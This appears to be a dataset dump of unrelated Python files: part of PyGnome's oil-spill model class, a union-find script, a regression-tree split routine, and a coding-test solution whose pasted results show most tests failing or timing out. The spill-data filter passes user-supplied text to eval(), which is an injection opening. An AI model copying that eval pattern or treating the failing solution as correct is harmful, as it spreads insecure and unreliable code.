Eventually, we want to get rid\n of 'fate_status' array and only manipulate 'status_codes'. Until then,\n update fate_status in move_elements\n '''\n\n if 'fate_status' in sc:\n on_land_mask = sc['status_codes'] == oil_status.on_land\n sc['fate_status'][on_land_mask] = fate.non_weather\n\n w_mask = ((sc['status_codes'] == oil_status.in_water)\n & ~(sc['fate_status'] & fate.skim == fate.skim)\n & ~(sc['fate_status'] & fate.burn == fate.burn)\n & ~(sc['fate_status'] & fate.disperse == fate.disperse))\n\n surf_mask = np.logical_and(w_mask, sc['positions'][:, 2] == 0)\n subs_mask = np.logical_and(w_mask, sc['positions'][:, 2] > 0)\n\n sc['fate_status'][surf_mask] = fate.surface_weather\n sc['fate_status'][subs_mask] = fate.subsurf_weather\n for i, sp in enumerate(sc.spills):\n if isinstance(sp.substance, NonWeatheringSubstance):\n nw_mask = sc['spill_num'] == i\n sc['fate_status'][nw_mask] = fate.non_weather\n\n\n def weather_elements(self):\n '''\n Weathers elements:\n\n - loops through all the weatherers, passing in the spill_container\n and the time range\n - a weatherer modifies the data arrays in the spill container, so a\n particular time range should not be run multiple times. It is\n expected that we are processing a sequence of contiguous time ranges.\n - Note: If there are multiple sequential weathering processes, some\n inaccuracy could occur. A proposed solution is to\n 'super-sample' the model time step so that it will be replaced\n with many smaller time steps. We'll have to see if this pans\n out in practice.\n\n '''\n if len(self.weatherers) == 0:\n # if no weatherers then mass_components array may not be defined\n return\n\n for sc in self.spills.items():\n # elements may have beached to update fate_status\n\n sc.reset_fate_dataview()\n\n for w in self.weatherers:\n for model_time, time_step in self._split_into_substeps():\n # change 'mass_components' in weatherer\n w.weather_elements(sc, time_step, model_time)\n #self.logger.info('density after {0}: {1}'.format(w.name, sc['density'][-5:]))\n\n #self.logger.info('density after weather_elements: {0}'.format(sc['density'][-5:]))\n\n def _split_into_substeps(self):\n '''\n :return: sequence of (datetime, timestep)\n (Note: we divide evenly on second boundaries.\n Thus, there will likely be a remainder\n that needs to be included. We include\n this remainder, which results in\n 1 more sub-step than we requested.)\n '''\n time_step = int(self._time_step)\n sub_step = time_step // self.weathering_substeps\n\n indexes = [idx for idx in range(0, time_step + 1, sub_step)]\n res = [(idx, next_idx - idx)\n for idx, next_idx in zip(indexes, indexes[1:])]\n\n if sum(res[-1]) < time_step:\n # collect the remaining slice\n res.append((sum(res[-1]), time_step % sub_step))\n\n res = [(self.model_time + timedelta(seconds=idx), delta)\n for idx, delta in res]\n\n return res\n\n def step_is_done(self):\n '''\n Loop through movers and weatherers and call model_step_is_done\n\n Remove elements that marked for removal\n\n Output data\n '''\n\n #run ops and aggregation step for mass_balance\n env = self.compile_env()\n for sc in self.spills.items():\n recalc_density(sc, env['water'])\n recalc_viscosity(sc, env['water'])\n aggregated_data.aggregate(sc)\n\n for mover in self.movers:\n for sc in self.spills.items():\n mover.model_step_is_done(sc)\n\n for w in self.weatherers:\n for sc in self.spills.items():\n w.model_step_is_done(sc)\n\n for outputter in self.outputters:\n outputter.model_step_is_done()\n\n for sc in self.spills.items():\n '''\n removes elements with oil_status.to_be_removed\n '''\n sc.model_step_is_done()\n\n # age remaining particles\n sc['age'][:] = sc['age'][:] + self.time_step\n\n def write_output(self, valid, messages=None):\n output_info = {'step_num': self.current_time_step}\n\n for outputter in self.outputters:\n if self.current_time_step == self.num_time_steps - 1:\n output = outputter.write_output(self.current_time_step, True)\n else:\n output = outputter.write_output(self.current_time_step)\n\n if output is not None:\n output_info[outputter.__class__.__name__] = output\n\n if len(output_info) > 1:\n # append 'valid' flag to output\n output_info['valid'] = valid\n\n return output_info\n\n def step(self):\n '''\n Steps the model forward in time.\n\n NOTE: in theory, it could also go backward with a negative time step,\n for hindcasting, but that has not been tested.\n '''\n isValid = True\n for sc in self.spills.items():\n # Set the current time stamp only after current_time_step is\n # incremented and before the output is written. Set it to None here\n # just so we're not carrying around the old time_stamp\n sc.current_time_stamp = None\n\n if self.current_time_step == -1:\n # starting new run so run setup\n self.setup_model_run()\n\n # let each object raise appropriate error if obj is incomplete\n # validate and send validation flag if model is invalid\n (msgs, isValid) = self.check_inputs()\n if not isValid:\n raise RuntimeError(\"Setup model run complete but model \"\n \"is invalid\", msgs)\n\n # going into step 0\n self.current_time_step += 1\n model_time = self.model_time\n for sc in self.spills.items():\n sc.current_time_stamp = model_time\n # this will only release an instantaneous release\n self.release_elements(model_time, model_time)\n\n # step 0 output\n output_info = self.output_step(isValid)\n\n return output_info\n\n elif self.current_time_step >= self._num_time_steps - 1:\n # _num_time_steps is set when self.time_step is set. If user does\n # not specify time_step, then setup_model_run() automatically\n # initializes it. Thus, do StopIteration check after\n # setup_model_run() is invoked\n self.post_model_run()\n raise StopIteration(\"Run complete for {0}\".format(self.name))\n\n else:\n # release half the LEs for this time interval\n half_step = timedelta(seconds=self.time_step / 2)\n self.release_elements(self.model_time,\n self.model_time + half_step)\n self.setup_time_step()\n self.move_elements()\n self.weather_elements()\n self.step_is_done()\n self.current_time_step += 1\n for sc in self.spills.items():\n sc.current_time_stamp = self.model_time\n # Release the remaining half of the LEs in this time interval\n self.release_elements(self.model_time - half_step,\n self.model_time)\n output_info = self.output_step(isValid)\n return output_info\n\n def output_step(self, isvalid):\n self._cache.save_timestep(self.current_time_step, self.spills)\n output_info = self.write_output(isvalid)\n\n self.logger.debug('{0._pid} '\n 'Completed step: {0.current_time_step} for {0.name}'\n .format(self))\n return output_info\n\n def release_elements(self, start_time, end_time):\n \"\"\"\n release elements into the model\n\n :param start_time: -- beginning of the release\n :param end_time: -- end of the release.\n \"\"\"\n\n num_released = 0\n env = self.compile_env()\n for sc in self.spills.items():\n # release particles\n num_released = sc.release_elements(start_time, end_time, environment=env)\n # initialize data - currently only weatherers do this so cycle\n # over weatherers collection - in future, maybe movers can also do\n # this\n if num_released > 0:\n for item in self.weatherers:\n if item.on:\n item.initialize_data(sc, num_released)\n\n aggregated_data.aggregate(sc, num_released)\n\n self.logger.debug(\"{1._pid} released {0} new elements for step:\"\n \" {1.current_time_step} for {1.name}\".\n format(num_released, self))\n return num_released\n\n def compile_env(self):\n '''\n Produces a dictionary of objects that describe the model environmental conditions\n\n Currently, only works with the 'water' object because the other environmental phenomena\n are not compatible yet\n '''\n env = {}\n water = self.find_by_attr('_ref_as', 'water', self.environment)\n if water:\n env['water'] = water\n else:\n env['water'] = None\n return env\n\n def __iter__(self):\n '''\n Rewinds the model and returns itself so it can be iterated over.\n '''\n self.rewind()\n\n return self\n\n def __next__(self):\n '''\n (This method satisfies Python's iterator and generator protocols)\n\n :return: the step number\n '''\n try:\n return self.step()\n except StopIteration:\n self.post_model_run()\n raise\n\n next = __next__ # for the Py2 iterator protocol\n\n def full_run(self, rewind=True):\n '''\n Do a full run of the model.\n\n :param rewind=True: whether to rewind the model first -- if set to\n false, model will be run from the current step to the end\n :returns: list of outputter info dicts\n '''\n if rewind:\n self.rewind()\n\n# self.setup_model_run()\n # run the model\n output_data = []\n while True:\n try:\n results = self.step()\n self.logger.info(\"ran step: {}\".format(self._current_time_step))\n self.logger.debug(pformat(results))\n output_data.append(results)\n except StopIteration:\n self.post_model_run()\n self.logger.info('** Run Complete **')\n break\n\n return output_data\n\n def _add_to_environ_collec(self, obj_added):\n '''\n if an environment object exists in obj_added, but not in the Model's\n environment collection, then add it automatically.\n todo: maybe we don't want to do this - revisit this requirement\n JAH 9/22/2021: We sort of need this now because a lot of script behavior expects\n it. A lamentable state of affairs indeed.\n '''\n if hasattr(obj_added, 'wind') and obj_added.wind is not None:\n if obj_added.wind not in self.environment:\n self.logger.info(f'adding wind {obj_added.wind.name}, id:{obj_added.wind.id}')\n self.environment += obj_added.wind\n\n if hasattr(obj_added, 'tide') and obj_added.tide is not None:\n if obj_added.tide not in self.environment:\n self.logger.info(f'adding tide {obj_added.tide.name}, id:{obj_added.tide.id}')\n self.environment += obj_added.tide\n\n if hasattr(obj_added, 'waves') and obj_added.waves is not None:\n if obj_added.waves not in self.environment:\n self.logger.info(f'adding waves {obj_added.waves.name}, id:{obj_added.waves.id}')\n self.environment += obj_added.waves\n\n if hasattr(obj_added, 'water') and obj_added.water is not None:\n if obj_added.water not in self.environment:\n self.logger.info(f'adding water {obj_added.water.name}, id:{obj_added.water.id}')\n self.environment += obj_added.water\n if hasattr(obj_added, 'current') and obj_added.current is not None:\n if obj_added.current not in self.environment:\n self.logger.info(f'adding current {obj_added.current.name}, id:{obj_added.current.id}')\n self.environment += obj_added.current\n\n def _callback_add_mover(self, obj_added):\n 'Callback after mover has been added'\n self._add_to_environ_collec(obj_added)\n self.rewind() # rewind model if a new mover is added\n\n def _callback_add_outputter(self, obj_added):\n 'Callback after outputter has been added'\n # hook up the cache\n obj_added.cache = self._cache\n\n def _callback_add_weatherer_env(self, obj_added):\n '''\n Callback after weatherer/environment object has been added. 'waves'\n environment object contains 'wind' and 'water' so add those to\n environment collection and the 'water' attribute.\n todo: simplify this\n '''\n self._add_to_environ_collec(obj_added)\n self.rewind() # rewind model if a new weatherer is added\n\n def _callback_add_spill(self, obj_added):\n self.rewind()\n\n def __eq__(self, other):\n check = super(Model, self).__eq__(other)\n if check:\n # also check the data in ordered collections\n if not isinstance(self.spills, other.spills.__class__):\n return False\n\n if self.spills != other.spills:\n return False\n\n return check\n\n def __ne__(self, other):\n return not self == other\n\n '''\n Following methods are for saving a Model instance or creating a new\n model instance from a saved location\n '''\n\n def spills_update_from_dict(self, value):\n 'invoke SpillContainerPair().update_from_dict'\n # containers don't need to be serializable; however, it was easiest to\n # put an update_from_dict method in the SpillContainerPair. Keep the\n # interface for this the same, so make it a dict\n return self.spills.update_from_dict({'spills': value})\n\n ## removed, as the one in GnomeId is being used anyway\n # def _create_zip(self, saveloc, name):\n # '''\n # create a zipfile and update saveloc to point to it. This is now\n # passed down to all the objects contained within the Model so they can\n # save themselves to zipfile\n # '''\n # if self.zipsave:\n # if name is None and self.name is None:\n # z_name = 'Model.gnome'\n # else:\n # z_name = name if name is not None else self.name + '.gnome'\n\n # # create the zipfile and update saveloc - _json_to_saveloc checks\n # # to see if saveloc is a zipfile\n # saveloc = os.path.join(saveloc, z_name)\n # z = zipfile.ZipFile(saveloc, 'w',\n # compression=zipfile.ZIP_DEFLATED,\n # allowZip64=self._allowzip64)\n # z.close()\n\n # return saveloc\n\n def save(self, saveloc='.', refs=None, overwrite=True):\n '''\n save the model state in saveloc. If self.zipsave is True, then a\n zip archive is created and model files are saved to the archive.\n\n :param saveloc=\".\": a directory or filename. If a directory, then either\n the model is saved into that dir, or a zip archive is\n created in that dir (with a .gnome extension).\n\n The file(s) are clobbered when save() is called.\n :type saveloc: A dir or file name (relative or full path) as a string.\n\n :param refs=None: dict of references mapping 'id' to a string used for\n the reference. The value could be a unique integer or it could be\n a filename. It is up to the creator of the reference list to decide\n how to reference a nested object.\n\n :param overwrite=True:\n\n :returns: references\n\n This overrides the base class save(). Model contains collections and\n model must invoke save for each object in the collection. It must also\n save the data in the SpillContainer's if it is a mid-run save.\n\n '''\n json_, saveloc, refs = super(Model, self).save(saveloc=saveloc,\n refs=refs,\n overwrite=overwrite)\n\n # because a model can be saved mid-run and the SpillContainer data\n # required to reload is not covered in the schema, need to add the\n # SpillContainer data afterwards\n if self.current_time_step > -1:\n '''\n hard code the filename - can make this an attribute if user wants\n to change it - but not sure if that will ever be needed?\n '''\n self._save_spill_data(saveloc, 'spills_data_arrays.nc')\n\n return json_, saveloc, refs\n\n def _save_spill_data(self, saveloc, nc_filename):\n \"\"\"\n save the data arrays for current timestep to NetCDF\n If saveloc is zipfile, then move NetCDF to zipfile\n \"\"\"\n nc_out = NetCDFOutput(nc_filename, which_data='all', cache=self._cache)\n nc_out.prepare_for_model_run(model_start_time=self.start_time,\n uncertain=self.uncertain,\n spills=self.spills)\n nc_out.write_output(self.current_time_step)\n\n if isinstance(saveloc, zipfile.ZipFile):\n saveloc.write(nc_filename, nc_filename)\n if self.uncertain:\n u_file = nc_out.uncertain_filename\n saveloc.write(u_file, os.path.split(u_file)[1])\n elif zipfile.is_zipfile(saveloc):\n with zipfile.ZipFile(saveloc, 'a',\n compression=zipfile.ZIP_DEFLATED,\n allowZip64=allowzip64) as z:\n z.write(nc_filename, nc_filename)\n if self.uncertain:\n u_file = nc_out.uncertain_filename\n z.write(u_file, os.path.split(u_file)[1])\n if self.uncertain:\n os.remove(u_file)\n os.remove(nc_filename)\n\n @classmethod\n def load(cls, saveloc='.', filename=None, refs=None):\n '''\n Load an instance of this class from an archive or folder\n\n :param saveloc: Can be an open zipfile.ZipFile archive, a folder, or a\n filename. If it is an open zipfile or folder, it must\n contain a ``.json`` file that describes an instance of\n this object type. If ``filename`` is not specified, it\n will load the first instance of this object discovered.\n If a filename, it must be a zip archive or a json file\n describing an object of this type.\n\n :param filename: If saveloc is an open zipfile or folder,\n this indicates the name of the file to be loaded.\n If saveloc is a filename, is parameter is ignored.\n\n :param refs: A dictionary of id -> object instances that will be used\n to complete references, if available.\n '''\n try:\n saveloc = os.fspath(saveloc)\n filename = os.fspath(filename)\n except TypeError:\n # it's not a path, could be an open zip file, or ...\n pass\n\n new_model = super(Model, cls).load(saveloc=saveloc,\n filename=filename,\n refs=refs)\n # Since the model may have saved mid-run, need to try and load\n # spill data\n # new_model._load_spill_data(saveloc, filename,\n # 'spills_data_arrays.nc')\n\n return new_model\n\n def _load_spill_data(self, saveloc, filename, nc_file):\n \"\"\"\n load NetCDF file and add spill data back in - designed for savefiles\n \"\"\"\n spill_data = None\n if isinstance(saveloc, zipfile.ZipFile):\n # saveloc is an open zipfile instance\n if nc_file not in saveloc.namelist():\n return\n\n spill_data = saveloc.extract(nc_file)\n if self.uncertain:\n spill_data_fname, ext = os.path.splitext(nc_file)\n ufname = '{0}_uncertain{1}'.format(spill_data_fname, ext)\n u_spill_data = saveloc.extract(ufname)\n else:\n if os.path.isdir(saveloc):\n if filename:\n saveloc = os.path.join(saveloc, filename)\n with zipfile.ZipFile(saveloc, 'r') as z:\n if nc_file not in z.namelist():\n return\n spill_data = z.extract(nc_file)\n if self.uncertain:\n spill_data_fname, ext = os.path.splitext(nc_file)\n fname = ('{0}_uncertain{1}'\n .format(spill_data_fname, ext))\n u_spill_data = z.extract(fname)\n\n if spill_data is None:\n return\n array_types = set()\n\n for m in self.movers:\n array_types.update(m.array_types)\n\n for w in self.weatherers:\n array_types.update(w.array_types)\n\n for sc in self.spills.items():\n sc.prepare_for_model_run(array_types)\n if sc.uncertain:\n (data, weather_data) = NetCDFOutput.read_data(u_spill_data,\n time=None,\n which_data='all')\n else:\n (data, weather_data) = NetCDFOutput.read_data(spill_data,\n time=None,\n which_data='all')\n\n sc.current_time_stamp = data.pop('current_time_stamp').item()\n sc._data_arrays = data\n sc.mass_balance = weather_data\n\n # delete file after data is loaded - since no longer needed\n os.remove(spill_data)\n if self.uncertain:\n os.remove(u_spill_data)\n\n def merge(self, model):\n '''\n merge 'model' into self\n '''\n for attr in self.__dict__:\n if (getattr(self, attr) is None and\n getattr(model, attr) is not None):\n setattr(self, attr, getattr(model, attr))\n\n # update orderedcollections\n for oc in self._oc_list:\n my_oc = getattr(self, oc)\n new_oc = getattr(model, oc)\n for item in new_oc:\n if item not in my_oc:\n my_oc += item\n\n # update forecast spills in SpillContainerPair\n # Uncertain spills automatically be created if uncertainty is on\n for spill in model.spills:\n if spill not in self.spills:\n self.spills += spill\n\n # force rewind after merge?\n self.rewind()\n\n def check_inputs(self):\n '''\n check the user inputs before running the model\n raise an exception if user can't run the model\n\n todo: check if all spills start after model ends\n\n fixme: This should probably be broken out into its\n own module, class, something -- with each test independent.\n '''\n (msgs, isValid) = self.validate()\n\n someSpillIntersectsModel = False\n num_spills = len(self.spills)\n if num_spills == 0:\n msg = '{0} contains no spills'.format(self.name)\n self.logger.warning(msg)\n msgs.append(self._warn_pre + msg)\n\n num_spills_on = 0\n for spill in self.spills:\n msg = None\n if spill.on:\n num_spills_on += 1\n\n start_pos = copy.deepcopy(spill.start_position)\n if not start_pos[2] >= 0:\n msg = ('Depth of spill is negative, spill is above the surface: {0}'.\n format(start_pos))\n self.logger.warning(msg)\n msgs.append(self._warn_pre + msg)\n warnings.warn('warning: ' + msg)\n\n if not np.all(self.map.on_map(start_pos)) :\n msg = ('{0} has start position outside of map bounds'.\n format(spill.name))\n self.logger.warning(msg)\n\n msgs.append(self._warn_pre + msg)\n\n elif hasattr(spill, 'end_position') and not np.all(spill.end_position == spill.start_position):\n end_pos = copy.deepcopy(spill.end_position)\n if not np.all(self.map.on_map(end_pos)):\n msg = ('{0} has start position outside of map bounds'.\n format(spill.name))\n self.logger.warning(msg)\n\n msgs.append(self._warn_pre + msg)\n\n # land check needs to be updated for Spatial Release\n if np.any(self.map.on_land(start_pos)):\n msg = ('{0} has start position on land'.\n format(spill.name))\n self.logger.warning(msg)\n\n msgs.append(self._warn_pre + msg)\n\n elif (hasattr(spill, 'end_position')\n and not np.all(spill.end_position == spill.start_position)):\n end_pos = copy.deepcopy(spill.end_position)\n if np.any(self.map.on_land(end_pos)):\n msg = ('{0} has start position on land'.\n format(spill.name))\n self.logger.warning(msg)\n\n msgs.append(self._warn_pre + msg)\n\n if spill.release_time < self.start_time + self.duration:\n someSpillIntersectsModel = True\n\n if spill.release_time > self.start_time:\n msg = ('{0} has release time after model start time'.\n format(spill.name))\n self.logger.warning(msg)\n\n msgs.append(self._warn_pre + msg)\n\n elif spill.release_time < self.start_time:\n msg = ('{0} has release time before model start time'\n .format(spill.name))\n self.logger.error(msg)\n\n msgs.append('error: {}: {}'\n .format(self.__class__.__name__, msg))\n isValid = False\n\n if spill.substance.is_weatherable:\n pour_point = spill.substance.pour_point\n\n if spill.substance.water is not None:\n water_temp = spill.substance.water.get('temperature')\n\n if water_temp < pour_point:\n msg = ('The water temperature, {0} K, '\n 'is less than the minimum pour point '\n 'of the selected oil, {1} K. '\n 'The results may be unreliable.'\n .format(water_temp, pour_point))\n\n self.logger.warning(msg)\n msgs.append(self._warn_pre + msg)\n\n rho_h2o = spill.substance.water.get('density')\n rho_oil = spill.substance.density_at_temp(water_temp)\n if np.any(rho_h2o < rho_oil):\n msg = ('Found particles with '\n 'relative_buoyancy < 0. Oil is a sinker')\n isValid = False\n raise GnomeRuntimeError(msg)\n\n if num_spills_on > 0 and not someSpillIntersectsModel:\n if num_spills > 1:\n msg = ('All of the spills are released after the '\n 'time interval being modeled.')\n else:\n msg = ('The spill is released after the time interval '\n 'being modeled.')\n\n self.logger.warning(msg) # for now make this a warning\n # self.logger.error(msg)\n msgs.append('warning: ' + self.__class__.__name__ + ': ' + msg)\n # isValid = False\n\n # check if movers and map overlap\n # this is mostly to catch different coordinate systems:\n # -180--180 vs 0--360\n map_bounding_box = self.map.get_map_bounding_box()\n for mover in self.movers:\n if not mover.on:\n continue\n bounds = mover.get_bounds()\n # check longitude is within map bounds\n # note: there is a BoundingBox class in utilities.geometry with an \"overlaps\" method.\n if (bounds[1][0] < map_bounding_box[0][0] or bounds[0][0] > map_bounding_box[1][0] or\n bounds[1][1] < map_bounding_box[0][1] or bounds[0][1] > map_bounding_box[1][1]):\n msg = ('One of the movers - {0} - does not overlap with the map bounds. '\n 'Check that they are in the same longitude coordinate system'\n .format(mover.name))\n self.logger.warning(msg) # for now make this a warning\n msgs.append('warning: ' + self.__class__.__name__ + ': ' + msg)\n\n return (msgs, isValid)\n\n def validate(self):\n '''\n invoke validate for all gnome objects contained in model\n todo: should also check wind, water, waves are defined if weatherers\n are defined\n '''\n # since model does not contain wind, waves, water attributes, no need\n # to call base class method - model requires following only if an\n # object in collection requires it\n env_req = set()\n msgs = []\n isvalid = True\n for oc in self._oc_list:\n for item in getattr(self, oc):\n # if item is not on, no need to validate it\n if hasattr(item, 'on') and not item.on:\n continue\n\n # validate item\n (msg, i_isvalid) = item.validate()\n if not i_isvalid:\n isvalid = i_isvalid\n\n msgs.extend(msg)\n\n # add to set of required env objects if item's\n # make_default_refs is True\n if item.make_default_refs:\n for attr in ('wind', 'water', 'waves'):\n if hasattr(item, attr):\n env_req.update({attr})\n\n # ensure that required objects are present in environment collection\n if len(env_req) > 0:\n (ref_msgs, ref_isvalid) = \\\n self._validate_env_coll(env_req)\n if not ref_isvalid:\n isvalid = ref_isvalid\n msgs.extend(ref_msgs)\n\n return (msgs, isvalid)\n\n def _validate_env_coll(self, refs, raise_exc=False):\n '''\n validate refs + log warnings or raise error if required refs not found.\n If refs is None, model must query its weatherers/movers/environment\n collections to figure out what objects it needs to have in environment.\n '''\n msgs = []\n isvalid = True\n\n if refs is None:\n # need to go through orderedcollections to see if water, waves\n # and wind refs are required\n raise NotImplementedError(\"validate_refs() incomplete\")\n\n for ref in refs:\n obj = self.find_by_attr('_ref_as', ref, self.environment)\n if obj is None:\n msg = (\"{0} not found in environment collection\".\n format(ref))\n if raise_exc:\n raise ReferencedObjectNotSet(msg)\n else:\n self.logger.warning(msg)\n msgs.append(self._warn_pre + msg)\n isvalid = False\n\n return (msgs, isvalid)\n\n def set_make_default_refs(self, value):\n '''\n make default refs for all items in ('weatherers', 'movers',\n 'environment') collections\n '''\n for attr in ('weatherers', 'movers', 'environment'):\n oc = getattr(self, attr)\n for item in oc:\n item.make_default_refs = value\n\n def list_spill_properties(self):\n '''\n Convenience method to list properties of a spill that\n can be retrieved using get_spill_property\n\n :return: list of spill simulation attributes\n '''\n\n return list(self.spills.items())[0].data_arrays.keys()\n\n def get_spill_property(self, prop_name, ucert=0):\n '''\n Convenience method to allow user to look up properties of a spill.\n User can specify ucert as 'ucert' or 1\n :return: list\n '''\n ucert = 1 if ucert == 'ucert' else 0\n return list(self.spills.items())[ucert][prop_name]\n\n def get_spill_data(self, target_properties, conditions, ucert=0):\n \"\"\"\n Convenience method to allow user to write an expression to filter\n raw spill data\n\n Example case::\n\n get_spill_data('position && mass',\n 'position > 50 && spill_num == 1 || status_codes == 1'\n )\n\n WARNING: EXPENSIVE! USE AT YOUR OWN RISK ON LARGE num_elements!\n\n Example spill element properties are below. This list may not contain\n all properties tracked by the model.\n\n 'positions', 'next_positions', 'last_water_positions', 'status_codes',\n 'spill_num', 'id', 'mass', 'age'\n\n \"\"\"\n\n if ucert == 'ucert':\n ucert = 1\n\n def elem_val(prop, index):\n '''\n Gets the column containing the information on one element\n '''\n val = list(self.spills.items())[ucert].data_arrays[prop][index]\n return val\n\n def test_phrase(phrase):\n for sub_cond in phrase:\n cond = sub_cond.rsplit()\n prop_val = elem_val(cond[0], i)\n op = cond[1]\n test_num = cond[2]\n if test(prop_val, op, test_num):\n return True\n\n return False\n\n def test(elem_value, op, test_val):\n if op in {'<', '<=', '>', '>=', '=='}:\n return eval(str(int(elem_value)) + op + test_val)\n\n def num(s):\n try:\n return int(s)\n except ValueError:\n return float(s)\n\n conditions = conditions.rsplit('&&')\n conditions = [str(cond).rsplit('||') for cond in conditions]\n\n sc = list(self.spills.items())[ucert]\n result = {}\n\n for t in target_properties:\n result[t] = []\n\n for i in range(0, len(sc)):\n test_result = True\n\n for phrase in conditions:\n if not test_phrase(phrase):\n test_result = False\n break\n\n if test_result:\n for k in result.keys():\n n = elem_val(k, i)\n result[k].append(n)\n\n return result\n\n def add_env(self, env, quash=False):\n for item in env:\n if not quash:\n self.environment.add(item)\n else:\n for o in self.environment:\n if o.__class__ == item.__class__:\n idx = self.environment.index(o)\n self.environment[idx] = item\n break\n else:\n self.environment.add(item)\n","repo_name":"NOAA-ORR-ERD/PyGnome","sub_path":"py_gnome/gnome/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":70729,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"32"} +{"seq_id":"15001318397","text":"# 0 1 2 3 4 5 6 7 8 9\n# 0 9 5 3\n# 1 8\n\nclass SetDS(object):\n\n def __init__(self):\n self.__setList = []\n\n def getList(self):\n return self.__setList\n\n def isConnect(self, p, q):\n set1 = None\n set2 = None\n for setItem in self.__setList:\n if p in setItem:\n set1 = setItem\n if q in setItem:\n set2 = setItem\n if set1 and set2 and set1 == set2:\n return True\n return False\n\n def connect(self, p, q):\n set1 = None\n set2 = None\n for setItem in self.__setList:\n if p in setItem:\n set1 = setItem\n if q in setItem:\n set2 = setItem\n if set1 and set2 and set1 == set2:\n return\n if set1 and set2 and set1 != set2:\n self.__setList.remove(set2)\n self.__setList.remove(set1)\n set1 = set1.union(set2)\n self.__setList.append(set1)\n if not set1 and not set2:\n self.__setList.append({p, q})\n if set1 and not set2:\n set1.add(q)\n if set2 and not set1:\n set2.add(p)\n\nquickDS = SetDS()\nN = int(input())\nn = int(input())\nfor _ in range(n):\n item = input()\n items = item.split(' ')\n quickDS.connect(int(items[0]), int(items[1]))\n\nsetLists = quickDS.getList()\nfor setItem in setLists:\n N = N - len(setItem) + 1\nprint(N)","repo_name":"wjwjwj2223/NeteaseAlgorithm","sub_path":"3/4_0_0.py","file_name":"4_0_0.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70764781211","text":"\"\"\"\n Determines the best split point for a node.\n\"\"\"\nfrom anova import *\n\nLEFT = -1\nRIGHT = 1\n\n\"\"\"\n Find the best split for ANOVA (regression trees)\n\n Data comes from the dataframe stored in 'node.data'. This will be trimmed to only include the\n data that reaches this node.\n\"\"\"\ndef bsplit(node, response, params):\n dataFrame = node.data\n yBar = getResponseColumn(dataFrame, response).iloc[:, 0].mean()\n deviance = AnovaSS(getResponseColumn(dataFrame, response))\n xDf = getExplanatoryColumns(node.data, response)\n bestSS = 9999999999\n baseSS = bestSS\n bestL1 = None\n bestL2 = None\n\n for var in xDf.columns:\n # sort on var? Yes, produces rpart results\n dataFrame = dataFrame.sort_values([var])\n where, direction, split, improvement = AnovaSplitPoint(dataFrame, response, params.minNode, var)\n\n # first split, left = 'yes' in the tree\n if direction < 0: # < x go left -- swapped > with < after and the tree is EXACTLY like rpart's\n L1 = dataFrame[dataFrame[var] < split]\n L2 = dataFrame[dataFrame[var] >= split]\n else: # < x go right (> x go left)\n L1 = dataFrame[dataFrame[var] > split]\n L2 = dataFrame[dataFrame[var] <= split]\n\n if params.delayed > 0 and improvement > 0:\n # create L3 and L4 from L1 an d L5 and L6 from L2\n # split L1\n bestLeftSS = 9999999999\n bestRightSS = 9999999999\n for var2 in xDf.columns:\n L1 = L1.sort_values([var2])\n whereL, directionL, splitL, improvementL = AnovaSplitPoint(L1, response, params.minNode, var2)\n if directionL < 0:\n L3 = L1[L1[var2] < splitL]\n L4 = L1[L1[var2] >= splitL]\n else:\n L3 = L1[L1[var2] > splitL]\n L4 = L1[L1[var2] <= splitL]\n thisSSLeft = AnovaSS(getResponseColumn(L3, response)) + AnovaSS(getResponseColumn(L4, response))\n\n if thisSSLeft < bestLeftSS and improvementL > 0:\n bestLeftSS = thisSSLeft\n\n L2 = L2.sort_values([var2])\n whereR, directionR, splitR, improvementR = AnovaSplitPoint(L2, response, params.minNode, var2)\n if directionR < 0:\n L5 = L2[L2[var2] < splitR]\n L6 = L2[L2[var2] >= splitR]\n else:\n L5 = L2[L2[var2] > splitR]\n L6 = L2[L2[var2] <= splitR]\n thisSSRight = AnovaSS(getResponseColumn(L5, response)) + AnovaSS(getResponseColumn(L6, response))\n\n# if node.numObs == 96:\n# print(\"splitR\\tdirectionR\\timproveR\\tsplitL\\n\\tdirectionL\\timproveL\")\n# print(var2, \"\\n\\t\", splitR, directionR, improvementR, \"\\n\\t\", splitL, directionL, improvementL)\n\n if thisSSRight < bestRightSS and improvementR > 0:\n bestRightSS = thisSSRight\n\n if bestLeftSS != baseSS and bestRightSS != baseSS:\n thisSS = bestLeftSS + bestRightSS\n else:\n thisSS = baseSS\n else:\n thisSS = AnovaSS(getResponseColumn(L1, response)) + AnovaSS(getResponseColumn(L2, response))\n\n if thisSS == baseSS:\n thisSS = AnovaSS(getResponseColumn(L1, response)) + AnovaSS(getResponseColumn(L2, response))\n if thisSS < bestSS and improvement > 0: # improvement > 0 -> a non-zero split point\n bestL1 = L1\n bestL2 = L2\n bestSS = thisSS\n\n node.splitPoint = split\n node.direction = direction\n node.splitIndex = where\n node.varName = var\n node.yval = yBar\n node.dev = deviance\n node.improvement = improvement\n\n return bestL1, bestL2\n","repo_name":"anthonymorast/pypart","sub_path":"best_split.py","file_name":"best_split.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69808216413","text":"from itertools import combinations, product\n\ndef solution(weights):\n siso_set = set()\n distance = [2, 3, 4]\n p = list(product(distance, weights))\n comb = list(combinations(p, 2))\n for i in range(len(comb)):\n left_d = comb[i][0][0]\n left_w = comb[i][0][1]\n right_d = comb[i][1][0]\n right_w = comb[i][1][1]\n if {left_w, right_w} in siso_set:\n continue\n \n if left_d * left_w == right_d * right_w:\n siso_set.add((left_w, right_w))\n \n return len(siso_set)\n\n# 정확성 테스트\n# 테스트 1 〉\t통과 (0.02ms, 10.4MB)\n# 테스트 2 〉\t실패 (0.28ms, 10.4MB)\n# 테스트 3 〉\t실패 (0.55ms, 10.1MB)\n# 테스트 4 〉\t실패 (시간 초과)\n# 테스트 5 〉\t실패 (시간 초과)\n# 테스트 6 〉\t실패 (시간 초과)\n# 테스트 7 〉\t실패 (시간 초과)\n# 테스트 8 〉\t실패 (시간 초과)\n# 테스트 9 〉\t실패 (시간 초과)\n# 테스트 10 〉\t실패 (시간 초과)\n# 테스트 11 〉\t실패 (시간 초과)\n# 테스트 12 〉\t실패 (시간 초과)\n# 테스트 13 〉\t실패 (시간 초과)\n# 테스트 14 〉\t실패 (시간 초과)\n# 테스트 15 〉\t실패 (시간 초과)\n# 테스트 16 〉\t통과 